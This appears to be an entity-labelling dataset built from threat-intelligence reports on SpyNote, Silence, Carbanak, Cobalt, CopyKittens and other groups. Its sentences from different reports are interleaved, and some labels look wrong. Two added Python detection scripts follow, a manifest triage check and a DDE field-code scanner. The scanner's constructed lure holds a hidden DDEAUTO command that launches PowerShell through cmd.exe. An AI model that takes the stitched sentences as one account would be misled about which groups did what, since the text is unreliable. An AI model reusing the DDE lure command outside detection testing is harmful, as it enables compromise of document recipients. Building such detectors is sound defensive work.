2017 SpyNote RAT posing as Netflix app As users have become more attached to their mobile devices , they want everything on those devices . 
Silence also started using Ivoke , a fileless loader , and EDA agent , both written in PowerShell . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies .", "spans": [{"start": 18, "end": 29, "label": "Malware"}, {"start": 40, "end": 51, "label": "System"}, {"start": 153, "end": 160, "label": "Organization"}, {"start": 180, "end": 185, "label": "System"}, {"start": 212, "end": 221, "label": "System"}, {"start": 325, "end": 333, "label": "Malware"}, {"start": 350, "end": 368, "label": "Organization"}, {"start": 379, "end": 396, "label": "Organization"}, {"start": 399, "end": 414, "label": "Organization"}, {"start": 419, "end": 431, "label": "Organization"}]} {"text": "There \u2019 s an app for just about any facet of one \u2019 s personal and professional life , from booking travel and managing projects , to buying groceries and binge-watching the latest Netflix series . Silence 2.0: Going Global is an extension of our original report: Silence: Moving into the Darkside which remains the most significant contribution to the research on the group and is the first such report to reveal Silence\u2019s activity . 
Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 180, "end": 187, "label": "Organization"}, {"start": 210, "end": 222, "label": "Organization"}, {"start": 368, "end": 373, "label": "Organization"}, {"start": 413, "end": 431, "label": "Organization"}, {"start": 434, "end": 442, "label": "Malware"}, {"start": 510, "end": 518, "label": "Organization"}, {"start": 610, "end": 617, "label": "Malware"}]} {"text": "The iOS and Android apps for Netflix are enormously popular , effectively turning a mobile device into a television with which users can stream full movies and TV programs anytime , anywhere . Since the report\u2019s release in September 2018 , Group-IB\u2019s Threat Intelligence team has detected 16 campaigns targeting banks launched by Silence . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 12, "end": 19, "label": "System"}, {"start": 29, "end": 36, "label": "Organization"}, {"start": 240, "end": 250, "label": "Organization"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 330, "end": 337, "label": "Organization"}, {"start": 417, "end": 425, "label": "Organization"}, {"start": 517, "end": 524, "label": "Malware"}]} {"text": "But the apps , with their many millions of users , have captured the attention of the bad actors , too , who are exploiting the popularity of Netflix to spread malware . Like the majority of APT groups , Silence uses phishing as their infection vector . 
From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space .", "spans": [{"start": 142, "end": 149, "label": "Organization"}, {"start": 204, "end": 211, "label": "Organization"}, {"start": 264, "end": 272, "label": "Malware"}, {"start": 309, "end": 314, "label": "Organization"}, {"start": 319, "end": 337, "label": "Organization"}, {"start": 379, "end": 384, "label": "Organization"}]} {"text": "Recently , the ThreatLabZ research team came across a fake Netflix app , which turned out to be a new variant of SpyNote RAT ( Remote Access Trojan ) . In the last successful attack described in Silence: Moving into the darkside , dated April 2018 , the hackers siphoned off about $150 , 000 through ATMs in a single night . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems .", "spans": [{"start": 15, "end": 25, "label": "Organization"}, {"start": 54, "end": 70, "label": "System"}, {"start": 113, "end": 124, "label": "Malware"}, {"start": 254, "end": 261, "label": "Organization"}, {"start": 336, "end": 344, "label": "Malware"}, {"start": 404, "end": 409, "label": "Organization"}, {"start": 416, "end": 431, "label": "Organization"}]} {"text": "SpyNote RAT is capable of performing a variety of alarming functions that includes : Activating the device \u2019 s microphone and listening to live conversations Executing commands on the device Copying files from the device to a Command & Control ( C & C ) center Recording screen captures Viewing contacts Reading SMS messages The screenshot below shows part of the sandbox \u2019 s report on the SpyNote RAT \u2019 s signature and detected functions : The fake Netflix app we are analyzing in this blog appears to be built using an updated version of SpyNote RAT builder , Prior to April 2018 , as described in Group-IB\u2019s Silence: Moving into the darkside report , Silence\u2019s target interests were primarily 
limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . The first successful bank robbery was committed by this group in January 2013 .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 390, "end": 401, "label": "Malware"}, {"start": 450, "end": 457, "label": "Organization"}, {"start": 540, "end": 551, "label": "Malware"}, {"start": 600, "end": 610, "label": "Organization"}]} {"text": "which was leaked last year . In 2018 , Silence conducted test campaigns to update their database of current targets and expand their attack geography . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer .", "spans": [{"start": 39, "end": 46, "label": "Organization"}, {"start": 223, "end": 231, "label": "Malware"}, {"start": 326, "end": 336, "label": "Malware"}, {"start": 341, "end": 352, "label": "Malware"}]} {"text": "Technical details Please note that our research is not about the legitimate Netflix app on Google Play . The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . 
We have no evidence of compromises against banks in Western Europe or United States , but it should be noted that the attackers methods could be utilized against banks outside of Russia as well .", "spans": [{"start": 76, "end": 87, "label": "System"}, {"start": 91, "end": 102, "label": "System"}, {"start": 116, "end": 123, "label": "Organization"}, {"start": 177, "end": 194, "label": "Malware"}, {"start": 259, "end": 264, "label": "Organization"}, {"start": 310, "end": 315, "label": "Organization"}, {"start": 385, "end": 394, "label": "Organization"}, {"start": 429, "end": 434, "label": "Organization"}]} {"text": "The spyware in this analysis was portraying itself as the Netflix app . Silence has conducted at least three campaigns using recon emails , followed by malicious mail sent to an updated recipient list . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research .", "spans": [{"start": 58, "end": 69, "label": "System"}, {"start": 72, "end": 79, "label": "Organization"}, {"start": 231, "end": 239, "label": "Malware"}, {"start": 273, "end": 278, "label": "Organization"}]} {"text": "Once installed , it displayed the icon found in the actual Netflix app on Google Play . Group-IB has also detected recon emails sent out to New Zealand . 
Without any insight into the evidence Kaspersky has obtained , we can only repeat our view that Anunak has targeted only banks in Russia and we have no concrete reports of compromised banks outside of Russia directly related to this criminal group .", "spans": [{"start": 59, "end": 70, "label": "System"}, {"start": 74, "end": 85, "label": "System"}, {"start": 88, "end": 96, "label": "Organization"}, {"start": 115, "end": 127, "label": "Malware"}, {"start": 192, "end": 201, "label": "Organization"}, {"start": 250, "end": 256, "label": "Organization"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 338, "end": 343, "label": "Organization"}]} {"text": "As soon as the user clicks the spyware \u2019 s icon for the first time , nothing seems to happen and the icon disappears from the home screen . Since our last public report , Silence has sent out more than 170 , 000 recon emails to banks in Russia , the former Soviet Union , Asia and Europe . Charming Kitten is an Iranian cyberespionage group operating since approximately 2014 .", "spans": [{"start": 171, "end": 178, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 290, "end": 305, "label": "Organization"}]} {"text": "This is a common trick played by malware developers , making the user think the app may have been removed . In November 2018 , Silence tried their hand at targeting the Asian market for the first time in their history . 
These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider .", "spans": [{"start": 127, "end": 134, "label": "Organization"}, {"start": 169, "end": 181, "label": "Organization"}, {"start": 248, "end": 263, "label": "Organization"}, {"start": 324, "end": 332, "label": "Organization"}, {"start": 368, "end": 376, "label": "Malware"}, {"start": 394, "end": 415, "label": "Organization"}, {"start": 428, "end": 441, "label": "Organization"}]} {"text": "But , behind the scenes , the malware has not been removed ; instead it starts preparing its onslaught of attacks . In total , Silence sent out about 80 , 000 emails , with more than half of them targeting Taiwan , Malaysia , and South Korea . The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research .", "spans": [{"start": 127, "end": 134, "label": "Organization"}, {"start": 248, "end": 264, "label": "Organization"}, {"start": 334, "end": 351, "label": "Organization"}]} {"text": "For contacting C & C , the spyware was found to be using free DNS services , as shown in the screenshot below : SpyNote RAT uses an unusual trick to make sure that it remains up and running and that the spying does not stop . Prior to April 2018 , as described in Group-IB\u2019s Silence: Moving into the darkside report , Silence\u2019s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . 
Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens .", "spans": [{"start": 62, "end": 65, "label": "Indicator"}, {"start": 112, "end": 123, "label": "Malware"}, {"start": 264, "end": 274, "label": "Organization"}, {"start": 318, "end": 327, "label": "Organization"}, {"start": 706, "end": 719, "label": "Organization"}, {"start": 730, "end": 736, "label": "Organization"}, {"start": 741, "end": 752, "label": "Organization"}]} {"text": "It does so using the Services , Broadcast Receivers , and Activities components of the Android platform . From 16 October 2018 to 1 January 2019 , Silence sent out about 84 , 000 emails in Russia alone to update their address database . Flying Kitten ( which is another name given by the security industry to Charming Kitten ) was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of the IRI ( Islamic Republic of Iran ) government and foreign espionage targets .", "spans": [{"start": 87, "end": 94, "label": "System"}, {"start": 147, "end": 154, "label": "Organization"}, {"start": 237, "end": 250, "label": "Organization"}, {"start": 288, "end": 305, "label": "Organization"}, {"start": 309, "end": 324, "label": "Organization"}, {"start": 348, "end": 354, "label": "Organization"}]} {"text": "Services can perform long-running operations in the background and does not need a user interface . As part of their phishing campaigns , silence still uses Microsoft Office documents with macros or exploits , CHM files , and .LNK shortcuts as malicious attachments . 
Flying Kitten was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of government and foreign espionage targets .", "spans": [{"start": 138, "end": 145, "label": "Organization"}, {"start": 268, "end": 281, "label": "Organization"}, {"start": 303, "end": 309, "label": "Organization"}, {"start": 406, "end": 416, "label": "Organization"}]} {"text": "Broadcast Receivers are Android components that can register themselves for particular events . In the former Soviet Union , Silence targeted banks in Kyrgyzstan , Kazakhstan , and Ukraine . At certain times , Mesri has been a member of an Iran-based hacking group called the Turk Black Hat security team \" .", "spans": [{"start": 24, "end": 31, "label": "System"}, {"start": 125, "end": 132, "label": "Organization"}, {"start": 142, "end": 147, "label": "Organization"}, {"start": 276, "end": 290, "label": "Organization"}]} {"text": "Activities are key building blocks , central to an app \u2019 s navigation , for example . In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort .", "spans": [{"start": 96, "end": 104, "label": "Organization"}, {"start": 170, "end": 175, "label": "Malware"}, {"start": 288, "end": 305, "label": "Organization"}]} {"text": "The SpyNote RAT registers a service called AutoStartup and a broadcast receiver named BootComplete . The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . 
TinyZBot is a bot written in C# and developed by the Cleaver team. Some of the teams publicly known today include Iranian Cyber Army, Ashiyane, Islamic Cyber Resistance Group, Izz ad-Din al-Qassam Cyber Fighters, Parastoo, Shabgard, Iran Black Hats and many others.

MainActivity registers BootComplete with a boot event, so that whenever the device is booted, BootComplete gets triggered. BootComplete starts the AutoStartup service, and the AutoStartup service makes sure that MainActivity is always running.

As the CnC server, Silence uses a CnC-3 server running Windows, from which they send commands to download additional modules. To control ATMs, the group uses the Atmosphere Trojan, which is unique to Silence, or a program called xfs-disp.exe.
However, even though the TTPs of the Cleaver team have some overlap with techniques used by Iranian Cyber Army, Ashiyane (SQL injection) and Syrian Electronic Army (phishing), we believe this is largely the work of a new team.

What follows are some of the features exhibited by SpyNote RAT.

Command execution
Command execution can create havoc for the victim if the malware developer decides to execute commands on the victim's device.

In addition, Silence downloads the reverse proxy programs Silence.ProxyBot and Silence.ProxyBot.NET, which are described in detail in the report Silence: Moving into the Darkside. Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability.

The Cobalt group's traditional "stomping grounds" are Eastern Europe, Central Asia, and Southeast Asia.
Leveraging this feature, the malware developer can root the device using a range of vulnerabilities, well-known or zero-day. The following screenshot shows the command execution functionality in action. The paramString parameter shown in the screenshot can be any command received from the C&C.

Screen capture and audio recording
SpyNote RAT was able to take screen captures and, using the device's microphone, listen to audio conversations.

Against targets in the CIS countries, the Cobalt group also used their own infrastructure, which included rented dedicated servers. In several cases, Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America, Europe, CIS countries, and Central and Southeast Asia. To ensure remote access to the workstation of an employee at a target organization, the Cobalt group (as in previous years) uses Beacon, a Trojan available as part of commercial penetration testing software.

Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled "Договор.doc" [Contract.doc]. Silence sent out emails to Russian banks.
This capability was confirmed when the Android permission android.permission.RECORD_AUDIO was being requested, along with code found in the app. SpyNote RAT captured the device's screen activities along with audio using the MediaProjectionCallback functionality (available with Lollipop, the Android 5.0 release, and later) and saved the output in a file named "video.mp4", as shown in the following screenshot.

SMS stealing
SpyNote RAT was also observed stealing SMS messages from the affected devices, as shown in the screenshot below.

Stealing contacts
The ability to steal contacts is a favorite feature for spyware developers, as the stolen contacts can be used to further spread the spyware. The following screenshot shows the contacts being stolen and written to a local array, which is then sent to the C&C.

Uninstalling apps
Uninstalling apps is another function favored by developers of Android spyware and malware.

The exploit installs Silence's loader, designed to download backdoors and other malicious programs. Silence conducted a massive phishing campaign posing as the Central Bank of the Russian Federation. Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence's Trojan, known as Silence.MainModule. Silence attacked financial organisations in the UK.

Artifacts indicated the involvement of the Cobalt group, which, according to Positive Technologies information, had performed similar successful attacks in Eastern Europe from August to October, and it is likely that this group will soon become active in the West. In a recent spear-phishing campaign, the Cobalt Group used a known remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike, but ended up revealing all targets. The basic principles of targeted attacks on financial institutions have not changed since 2013, when the Anunak, Corkow, Buhtrap, and Lurk groups began conducting the first attacks on Russian banks.
They tend to target any antivirus protections on the device and uninstall them, which increases the possibility of their malware persisting on the device. The following screenshot shows this functionality in action.

Other functions
In addition to the functionalities we've described, the SpyNote RAT was exhibiting many other behaviors that make it more robust than most off-the-shelf malware.

Silence conducted the first stage of their Asian campaign, organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software. The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks. On 24 March 2019, Silence.ProxyBot (MD5 2fe01a04d6beef14555b2cf9a717615c) was uploaded to VirusTotal from an IP address in Sri Lanka.

This isn't the first time we've seen Cobalt make this error: back in March, an attack focusing on 1,880 targets across financial institutions in Kazakhstan had the same flaw. The Carbanak attacks targeted over 100 financial institutions worldwide.
The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over 100 financial institutions worldwide has been arrested in Alicante, Spain, after a complex investigation conducted by the Spanish National Police. Since 2013, the Cobalt group has attempted to attack banks and financial institutions using pieces of malware they designed.

SpyNote RAT was designed to function only over Wi-Fi, which is the preferable mode for Android malware to send files to the C&C. The screenshot below shows SpyNote RAT scanning for Wi-Fi and enabling it if a known channel is found.

Additional features
- SpyNote RAT could click photos using the device's camera, based on commands from the C&C.

On October 18th, 2018, the group sent out emails to British financial companies as part of their preparatory campaign. Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019.
Since 2013, the cybercrime gang has attempted to attack banks, e-payment systems and financial institutions using pieces of malware they designed, known as Carbanak and Cobalt. The organised crime group started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world.

- There were two interesting sub-classes found inside MainActivity: Receiver and Sender. Receiver was involved in receiving commands from the server, and the main functionality of Sender was to send all the data collected to the C&C over Wi-Fi.

According to local media reports, in 2019 Silence successfully withdrew money from a Bangladeshi bank twice within 2 months. To do this, the actor may have used a unique tool called Atmosphere, a Trojan developed by Silence to remotely control ATM dispensers, or a similar program called xfs-disp.exe, which the actor may have used in their attack on IT Bank.
One of the Cobalt Group's latest campaigns, an attack that leads to a Cobalt Strike beacon and to a JavaScript backdoor, was investigated and presented by the Talos research team.

- SpyNote RAT was also collecting the device's location to identify the exact location of the victim.

SpyNote RAT builder
The SpyNote Remote Access Trojan (RAT) builder is gaining popularity in the hacking community, so we decided to study its pervasiveness.

As we described in the Silence: Moving into the Darkside report, Silence has experience with theft using compromised card processing systems. In February 2019, Russian media reported a Silence attack on IT Bank in the city of Omsk.
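The SpyNote features described above (a BootComplete receiver that starts the AutoStartup service on boot, audio recording behind android.permission.RECORD_AUDIO, SMS and contact theft, Wi-Fi-only exfiltration, camera and location) all leave traces in the app's manifest before any code is read. The following static triage check is an added example, not code from the Zscaler write-up: it runs over a decoded AndroidManifest.xml (apktool or similar output), flags the boot-persistence pattern and the permission set that backs those features, and scores the result. The package name com.example.fakegame, both sample manifests, the permission-to-feature mapping and the alert threshold are constructed or assumed here.

```python
"""Static triage of a decoded AndroidManifest.xml for SpyNote-style behaviour.

Added example, not code from the original write-up. The sample manifests are
constructed; the feature mapping and the score threshold are assumptions.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = "{%s}name" % ANDROID_NS
BOOT_ACTION = "android.intent.action.BOOT_COMPLETED"
BOOT_PERMISSION = "android.permission.RECEIVE_BOOT_COMPLETED"

# Permissions that back the RAT features the text describes (assumed mapping).
SPY_PERMISSIONS = {
    "android.permission.RECORD_AUDIO": "audio recording",
    "android.permission.READ_SMS": "SMS theft",
    "android.permission.RECEIVE_SMS": "SMS interception",
    "android.permission.READ_CONTACTS": "contact theft",
    "android.permission.ACCESS_FINE_LOCATION": "location tracking",
    "android.permission.CAMERA": "photo capture",
    "android.permission.CHANGE_WIFI_STATE": "Wi-Fi control for exfiltration",
}


def triage_manifest(xml_text):
    """Return findings for one decoded manifest as a plain dict."""
    root = ET.fromstring(xml_text)
    perms = {p.get(A_NAME) for p in root.findall("uses-permission")}
    app = root.find("application")
    services = [s.get(A_NAME) for s in app.findall("service")] if app is not None else []
    boot_receivers = []
    if app is not None:
        for rcv in app.findall("receiver"):
            # <action> elements sit inside <intent-filter>; iter() reaches them.
            actions = {a.get(A_NAME) for a in rcv.iter("action")}
            if BOOT_ACTION in actions:
                boot_receivers.append(rcv.get(A_NAME))
    # A BOOT_COMPLETED receiver only fires if the permission is also declared,
    # and the SpyNote pattern needs a service for the receiver to hand off to.
    boot_persistence = bool(boot_receivers) and bool(services) and BOOT_PERMISSION in perms
    features = sorted(SPY_PERMISSIONS[p] for p in perms if p in SPY_PERMISSIONS)
    return {
        "boot_receivers": boot_receivers,
        "services": services,
        "boot_persistence": boot_persistence,
        "spy_features": features,
        "score": (2 if boot_persistence else 0) + len(features),
    }


def is_suspicious(findings, threshold=3):
    """Assumed threshold: persistence plus one spy feature, or three spy features."""
    return findings["score"] >= threshold


# Constructed manifest mirroring the components named in the text.
SPYNOTE_LIKE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakegame">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
  <application android:label="Super Mario Run">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".AutoStartup"/>
    <receiver android:name=".BootComplete">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed benign manifest: a background service, but no boot hook or spy permissions.
BENIGN = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity"/>
    <service android:name=".SyncService"/>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for label, manifest in (("spynote-like", SPYNOTE_LIKE), ("benign", BENIGN)):
        f = triage_manifest(manifest)
        print(label, "suspicious" if is_suspicious(f) else "clean", f)
```

The manifest alone cannot tell a RAT from a legitimate messaging app that also reads SMS and contacts, which is why the check weights the boot-persistence pattern separately and why a hit should send the sample on to dynamic analysis rather than straight to a verdict.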
The Cobalt group misused Cobalt Strike, for instance, to perpetrate ATM cyber heists and target financial institutions across Europe and, interestingly, Russia.

What we found were several other fake apps developed using the SpyNote builder, which should come as a warning to Android users. Some of the targeted apps were:
- Whatsapp
- YouTube Video Downloader
- Google Update
- Instagram
- Hack Wifi
- AirDroid
- WifiHacker
- Facebook
- Photoshop
- SkyTV
- Hotstar
- Trump Dash
- PokemonGo
with many more to come.

On 16 January 2019, Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 (see section 'Attack timeline'). Group-IB specialists determined that the email addresses of IT Bank employees were among the recipients of these emails.
If successful, Cobalt goes on to attack financial institutions outside the country. The vulnerability was used to retrieve and execute Cobalt Strike from a remote server they controlled.

Furthermore, we found that in just the first two weeks of 2017, more than 120 such spyware variants had already been built using the same SpyNote Trojan builder as SpyNote RAT and were roaming in the wild.

The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine. Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE, with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server.
As part of our monitoring of Iranian threat agents' activities, we have detected that from October 2016 until the end of January 2017, the Jerusalem Post, as well as multiple other Israeli websites and one website in the Palestinian Authority, were compromised by the Iranian threat agent CopyKittens. CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date, and are analyzed in this report: the TDTESS backdoor; Vminst, a lateral movement tool; NetSrv, a Cobalt Strike loader; and ZPP, a file compression console program.

Conclusion
The days when one needed in-depth coding knowledge to develop malware are long gone. Nowadays, script kiddies can build a piece of malware that can create real havoc.

Since at least 2011, these hackers have been using malware to spy on corporate networks. Hackers are targeting high-tech companies as well as chemical and pharmaceutical companies.
CopyKittens often uses the trial version of Cobalt Strike, publicly available commercial software for "Adversary Simulations and Red Team Operations". Other public tools used by CopyKittens are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, a PowerShell and Python post-exploitation agent.

Moreover, there are many toolkits like the SpyNote Trojan builder that enable users to build malware with ease and a few clicks. In particular, avoid side-loading apps from third-party app stores and avoid the temptation to play games that are not yet available on Android.

The hackers will map a company's network and look for strategically favorable locations for placing their malware. The corporation confirms the Winnti incident and issues the following statement: "The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions." Henkel claims that "a very small portion" of its worldwide IT systems had been affected: the systems in Germany.
The group, which we have given the name Gallmaker, has been operating since at least December 2017, with its most recent activity observed in June 2018. Rather, the Gallmaker attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools.

Yes, we are talking about SuperMarioRun, which was recently launched by Nintendo only for iOS users. Recent blogs by the Zscaler research team explain how some variants of Android malware are exploiting the popularity of this game and tricking Android users into downloading a fake version.

A BASF spokeswoman tells us in an email that in July 2015, hackers had successfully overcome the "first levels" of defense. The tool was written by staff of Thyssenkrupp, because the industrial giant (company number eleven) had been spied on by Winnti.
Gallmaker used lure documents that attempt to exploit the Microsoft Office Dynamic Data Exchange (DDE) protocol in order to gain access to victim machines. Should a user enable this content, the attackers are then able to use the DDE protocol to remotely execute commands in memory on the victim's system.

You should also avoid the temptation to play games from sources other than legitimate app stores; such games are not safe and may bring harm to your reputation and your bank account.

Hackers are charged with spying on a manufacturer of gas turbines. The Hong Kong government was spied on by the Winnti hackers. Back in 2013, CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz news, an Israeli newspaper.

FakeSpy Masquerades as Postal Service Apps Around the World
July 1, 2020

KEY FINDINGS
The Cybereason Nocturnus team is investigating a new campaign involving FakeSpy, an Android mobile malware that emerged around October 2017.
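A DDE lure of the kind described above needs no macro and no exploit: the command sits in a field code inside the document, and Word runs it once the user accepts the "update links" prompts. The scanner below is an added example, not Symantec's code. It unpacks a .docx (a zip archive), reads every XML part under word/ (body, headers, footers, footnotes), reassembles each field's instruction text between its fldChar begin/end markers, and matches DDE or DDEAUTO case-insensitively, so the common evasions of splitting the instruction across several runs and mixing case do not hide it. Both sample documents, including the powershell command string in the lure, are constructed in memory for the example. It does not cover the CVE-2017-11882 Equation Editor exploit that the Silence and Cobalt sections mention, which lives in an embedded OLE object rather than a field code.

```python
"""Find DDE / DDEAUTO field codes in a .docx, the lure technique described above.

Added example, not Symantec's code. The two sample documents are constructed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def w(tag):
    return "{%s}%s" % (W_NS, tag)


DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def field_codes(xml_bytes):
    """Yield the joined instruction text of every field in one XML part."""
    stack = []  # one buffer per open field, so nested fields are kept apart
    for el in ET.fromstring(xml_bytes).iter():
        if el.tag == w("fldSimple"):
            yield el.get(w("instr"), "")
        elif el.tag == w("fldChar"):
            kind = el.get(w("fldCharType"))
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                yield "".join(stack.pop())
        elif el.tag == w("instrText") and stack:
            stack[-1].append(el.text or "")


def scan_docx(data):
    """Return (part name, whitespace-normalised field code) for every DDE-looking field."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                for code in field_codes(zf.read(name)):
                    if DDE_RE.search(code):
                        hits.append((name, " ".join(code.split())))
    return hits


def make_docx(parts):
    """Build a minimal .docx in memory from {part name: xml} (constructed sample)."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/></Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


DOC_OPEN = '<w:document xmlns:w="%s"><w:body>' % W_NS
DOC_CLOSE = "</w:body></w:document>"

# Constructed lure: the DDEAUTO instruction is split across three runs with mixed case.
LURE_BODY = DOC_OPEN + (
    "<w:p>"
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> dDe</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">AUTO c:\\\\Windows\\\\System32\\\\cmd.exe </w:instrText></w:r>'
    '<w:r><w:instrText>"/k powershell -w hidden"</w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    "<w:r><w:t>Loading document...</w:t></w:r>"
    '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
    "</w:p>"
) + DOC_CLOSE

# Constructed clean document: ordinary PAGE and HYPERLINK fields only.
CLEAN_BODY = DOC_OPEN + (
    '<w:p><w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>'
    '<w:p><w:fldSimple w:instr=\' HYPERLINK "https://example.invalid" \'>'
    "<w:r><w:t>link</w:t></w:r></w:fldSimple></w:p>"
) + DOC_CLOSE

LURE_DOCX = make_docx({"word/document.xml": LURE_BODY})
CLEAN_DOCX = make_docx({"word/document.xml": CLEAN_BODY})

if __name__ == "__main__":
    for label, blob in (("lure", LURE_DOCX), ("clean", CLEAN_DOCX)):
        print(label, scan_docx(blob))
```

Matching on the reassembled instruction rather than on the raw XML is the point: a regex over the file bytes misses the split-run variant, and a check limited to word/document.xml misses a field planted in a header or footnote.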
Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX.

Gallmaker's activity appears to be highly targeted, with its victims all related to the government, military, or defense sectors. Gallmaker's targets are embassies of an Eastern European country.

FakeSpy is an information stealer used to steal SMS messages, send SMS messages, steal financial data, read account information and contact lists, steal application data, and do much more. FakeSpy first targeted South Korean and Japanese speakers.

While OceanLotus' targets are global, their operations are mostly active within the APAC region, which encompasses targeting private sectors across multiple industries, foreign governments, activists, and dissidents connected to Vietnam. NewsBeef attacks against Saudi Arabian organizations and individuals (as well as targets in the European Union) are likely to continue.
There are no obvious links between the Eastern European and Middle Eastern targets, but it is clear that Gallmaker is specifically targeting the defense, military, and government sectors. The group has carried out attacks most months since December 2017. Its activity subsequently increased in the second quarter of 2018, with a particular spike in April 2018.

However, it has begun to target users all around the world, especially users in countries like China, Taiwan, France, Switzerland, Germany, the United Kingdom, the United States, and others. FakeSpy masquerades as legitimate postal service apps and transportation services in order to gain the users' trust. Once installed, the application requests permissions so that it may control SMS messages and steal sensitive data on the device, as well as proliferate to other devices in the target device's contact list.

Rapid7 discovered that additional data was placed into the Dropbox accounts under control of APT10 during the compromise and was able to attribute data that was placed into it as being owned by Visma. Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe.

These RAT families are discussed in Novetta's other report on the Lazarus Group's RAT and Staging capabilities.
The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect.

Cybereason's investigation shows that the threat actor behind the FakeSpy campaign is a Chinese-speaking group dubbed "Roaming Mantis", a group that has led similar campaigns. FakeSpy has been in the wild since 2017; this latest campaign indicates that it has become more powerful.

